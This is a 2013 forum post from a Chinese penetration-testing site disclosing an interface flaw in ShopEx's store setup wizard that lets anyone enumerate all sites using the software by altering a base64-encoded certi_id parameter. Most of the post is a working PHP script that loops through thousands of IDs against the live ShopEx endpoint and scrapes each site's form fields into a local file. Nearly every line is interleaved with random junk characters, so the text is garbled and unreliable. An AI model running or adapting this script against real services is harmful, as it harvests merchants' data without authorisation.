中国网络渗透测试联盟

标题: ShopEx某接口缺陷可遍历所有用户网站 [打印本页]
作者: admin    时间: 2013-9-21 15:59
标题: ShopEx某接口缺陷可遍历所有用户网站
简要描述:( n- |$ N5 q2 d* g
ShopEx某接口缺陷,可遍历所有网站% W5 i5 T: n' U
详细说明:
, o$ _4 c2 _3 C3 d1 J' {% ?, N问题出现在shopex 网店使用向导页面 3 O3 E: [$ Y# Q  S) \) t& K
- R$ T  }1 k6 k6 w! v( {+ B* a

% a  v4 ?' m) h, U( Y, L
4 i- q2 r: ?7 S; C) f9 F" }http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
9 ]& v# c' h& F; E0 @" e5 t1 S
! D4 s9 t* K! [0 I1 h. G' f! a
  g/ V3 H- D2 O5 Q' h5 E' E
& ~) s8 a' [' L8 x8 x# D& grefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}% U( ]0 n+ \8 J/ q- N& }3 t  f

, t9 v, T; s& ~) u
5 Q, B5 N8 ^* e. [0 n1 Z
7 j8 Q& R1 f8 ]8 b, V: {5 D我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 9 r# N. e* a( s+ O+ W/ Q2 f. V
4 s9 P! [& K4 [7 y4 H
; _+ ~, U( q1 s% {6 f: A" i

5 o" z0 r. u% Q<?php
4 c2 N6 j4 K9 M4 Z
3 R7 m3 a; x  K% [0 t3 B                for ($i=1; $i < 10000; $i++) { //遍历
! K: [& b, V4 m) c# b! X
( k. B. D/ W% b: I# M                        ShowshopExD($i);' w% q1 O! y$ o

! @* l" k( g6 l& Q: `9 f! D# }                }% |9 e  L9 l* r( C! q5 _  n8 T. E
4 L2 @6 o% r/ Z0 X$ o$ x
                function ShowshopExD($cid) {
4 M- f( @( g! W4 p  i2 _( ^. m6 S9 R* i) Q- d+ j6 u
                $url='http://guide.ecos.shopex.cn/step2.php';* y9 _% @% m: N2 R

" \% U) X& Q' M+ \, F                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
/ O$ }2 n  ]: R8 \
5 ^, b  ~$ m* J8 b+ L9 ~+ k        $url = $url.'?refer='.$refer;
! p2 X1 ?1 Z7 H7 u9 X
- w0 O# Z1 F- I3 Z        $ch = curl_init($url);: t6 Q! ^4 Z, _+ D
5 t$ p# N6 S- n. f& c9 I! |* d5 f
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;7 f+ n9 @; F; c
) ^* Q# T+ c0 ^: o( a
        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
- y) L% |( j9 H& K
# R4 h4 ?; u% q7 {# p* r) v        $result = curl_exec($ch);8 k& [$ @) w' i- N( r- |

+ f( r! v  X+ L' q        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
' o* d& a5 I* }: S& P, y/ _9 w# O. T2 W3 [; t* G; l4 i
        if(strpos($result,$refer)), w1 P: u6 o. |. t

% P  E9 ?+ s5 |+ {        {
6 d& J& `4 v3 T& u: @/ e. ~, r2 |- x' h' V8 r% H( K- t& U
                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
! q0 ]; u! m+ w( y; U% L- k2 v$ |0 s0 V& Z* @- M4 v
                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);, u$ {4 k- P) S0 H6 L

( ^2 E# Y  k9 I                foreach ($value[1] as $key) {
! y6 x2 c& [. o- j9 r& ?! [6 L7 P$ r2 W# g0 q/ k& C
                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
+ q* r& U4 e4 a9 h: x7 x: ~5 |* W% \: b3 X0 s
                        echo $res[1][0].':'.$res[3][0]."\r\n";
' J2 X( H, _9 `$ n1 V8 G" X% N! |( R( ?
                        $col =$res[1][0].':'.$res[3][0]."\r\n"; , J5 E4 e2 A, e5 q+ {3 B
/ k7 M# j3 L! Z1 Y2 M8 k3 g0 P
                        fwrite($fp, $col, strlen($col)); & N4 {5 l' q; @. _

$ @) L% R% Y% @1 Y3 A                }
6 Y6 y/ s' `0 t% R* p1 \- i: I# M% J  A+ h, b
                echo '--------------------------------'."\r\n";
% p, @, @% w! F8 d( p/ {
/ X2 s4 M; Z  G' F                fclose($fp);
, c. D) _9 M3 O. \/ }4 {  n1 Y, Z% h. u+ J4 v
        }
  h4 H! W4 e0 R" ~- U! o
" ~- K2 H% r) q! Q" _. _1 q        flush();! {( h, S, Z3 o, ~
$ R  y  |0 I/ U4 f: H; ]$ D
        curl_close($ch);9 `' Y" E/ l( e) B. r; Q1 K! L
8 |7 z5 l$ `3 f, O* r4 I
                }
; ]5 P0 f3 Z2 N: S
8 z/ L$ {1 _7 I, Q5 H4 x/ {6 I9 z9 @?>% T; R; j- \4 F& m3 W' y. y
漏洞证明:% B$ p6 K6 x& A# }9 q* p7 C5 o
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
: L! f; |' G: L6 v1 s' }refer换成其他加密方式
6 H: h" x5 C+ ^0 b6 C5 H/ Z



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2